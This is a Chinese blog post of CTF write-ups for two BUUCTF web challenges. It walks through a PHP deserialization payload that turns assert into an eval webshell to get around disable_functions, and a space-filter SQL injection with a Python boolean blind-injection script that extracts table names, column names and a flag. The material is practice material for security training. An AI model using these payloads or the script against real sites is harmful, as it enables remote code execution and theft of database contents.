BUU_刷题之旅(One)

最新推荐文章于 2023-11-27 22:17:15 发布
最新推荐文章于 2023-11-27 22:17:15 发布
阅读量1k 收藏
点赞数 2
分类专栏: CTF_Writeup 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/106189612
版权

前言:

水平不够,刷题来凑!

[NPUCTF2020]ReadlezPHP

——反序列化、disable_functions的绕过、flag隐藏在phpinfo中
在这里插入图片描述
开始以为这一堆0101有什么线索,看了大半天也没找出来,抓包的时候发现
在这里插入图片描述
访问一下,发现是php代码

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

考察的是反序列化,代码很简单,但不要上来就直接使用system等函数去查看,先看下phpinfo都禁用了哪些函数

<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = '5';
        $this->b = "phpinfo";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;
echo serialize($c);

在这里插入图片描述
system函数等都被禁用了,但是assert函数没有被禁用,可以利用一下写入木马

  public function __construct(){
        $this->a = 'eval($_POST[\'a\'])';
        $this->b = "assert";
    }
O:8:"HelloPhp":2:{s:1:"a";s:17:"eval($_POST['a'])";s:1:"b";s:6:"assert";}

蚁剑连接一下,利用插件工具可以查看到根目录下的flag在这里插入图片描述
但是这个flag是假的,真的flag在phpinfo()
在这里插入图片描述

[WUSTCTF2020]颜值成绩查询

——空格过滤、布尔盲注、联合查询
在这里插入图片描述
有回显,手动测试闭合符号,发现无论是各种万能密码都报错,想了想应该是过滤掉了空格,使用/**/代替发现1/**/order/**/by/**/2#可以正常回显,所以无闭合符号,所以下面就有两种方法做,一种是联合查询,一种是布尔盲注

联合查询,发现union被过滤,可以双写绕过
在这里插入图片描述
下面就是套用语句去读取了

布尔盲注,脚本如下:

import string
import requests

if __name__ =='__main__':
	payloads = string.ascii_letters + string.digits + ',./?|}{_@#$%^&*()_=-'
	s=requests.session()
	temp = ''
	
	for i in range(1,50):
		print("value:")
		for p in payloads:
			# url = "http://3f1d7e79-8423-466a-96e4-e9ccec20e9a9.node3.buuoj.cn/?stunum=if((select(substr(group_concat(table_name),{},1))from/**/information_schema.tables/**/where/**/table_schema=database())='{}',1,2)".format(i,p)
			# url = "http://3f1d7e79-8423-466a-96e4-e9ccec20e9a9.node3.buuoj.cn/?stunum=if((select(substr(group_concat(column_name),{},1))from/**/information_schema.columns/**/where/**/table_schema=database())='{}',1,2)".format(i,p)
			url = "http://3f1d7e79-8423-466a-96e4-e9ccec20e9a9.node3.buuoj.cn/?stunum=if((select(substr(group_concat(value),{},1))from/**/flag)='{}',1,2)".format(i,p)

			reponse = s.get(url=url,timeout=3).text
			if 'Hi admin' in reponse:
				temp += p 
				print(temp)
				break

在这里插入图片描述

lemonl1
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
[NPUCTF2020]ReadlezPHP
wp568的博客
08-15 239
2. HelloPhp这个类的析构函数会执行echo $b($a)代码,当b=system,a=phpinfo()时,会执行函数查看到phpinfo界面。3. 可以构建HelloPhp的序列化字符串,data传入时反序列化就会执行析构函数。获取HelloPhp类的序列化字符串:这里屏蔽了system,改用了assert。1. 需要我们输入data参数,之后将data参数反序列化执行。查看phpinfo获取到flag。
第五十九题——[NPUCTF2020]ReadlezPHP
分享简单的安全技术
05-08 312
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,按f12查看源码,看到一个跳转提示:/time.php?source 第二步:查看time.php界面,发现源代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s";
cipher_CIPHER_
09-29
标题中的"Cipher_CIPHER_"可能指的是密码学中的加密算法或安全协议,这在IT行业中是非常重要的一环,特别是在数据传输、网络安全以及信息安全存储等领域。"Hi3520D"则可能是一个芯片型号,通常用于处理视频编码、...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
[NPUCTF2020]ReadlezPHP【web系列】
shutTD的博客
10-05 402
打开题目发现是一个帅帅的界面发现没什么有用的,那就f12康康有什么有用的,仔细查看每一个标签发现有一个网址我们跟着点进去一看发现是一段源代码,那这里就是解题的入口了看到就知道这道题是php反序列化了,所以接下来就是php反序列化做题流程。这题反序列化链很短,入口即终点,我们跟进发现那么这里就是个危险函数了也是我们的解题的最终步骤,在这里我们就需要认识一个函数了。
web:[NPUCTF2020]ReadlezPHP
最新发布
sleepywin的博客
11-27 316
并在构造函数中将它们分别初始化为字符串 "Y-m-d h:i:s" 和 "date"。函数将当前文件的源代码高亮显示并输出,然后终止程序。然后,通过判断 GET 请求中是否包含参数。符号将可能产生的错误屏蔽,防止错误信息泄露。这段代码是一个简单的 PHP 类,名为。,它在对象销毁时被调用。猜测可能是过滤了部分函数,尝试用别的。发现一个网址,访问这个页面查看。参数反序列化为对象,并使用。没发现其他的线索,查看源代码。函数将 GET 请求中的。类中还定义了一个析构函数。之后的代码中,创建了一个。
[BUUCTF][NPUCTF2020]ReadlezPHP
朋克归零膏的博客
10-28 309
执行函数的方式挺有意思,但是平时自己就没怎么总结过各种php执行代码的方式,现在总结一下。
BUU刷题-Pwn-others_shellcode
一个啥也不会的小菜鸡!
08-10 166
系统调用号,nc即可获得shell。
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值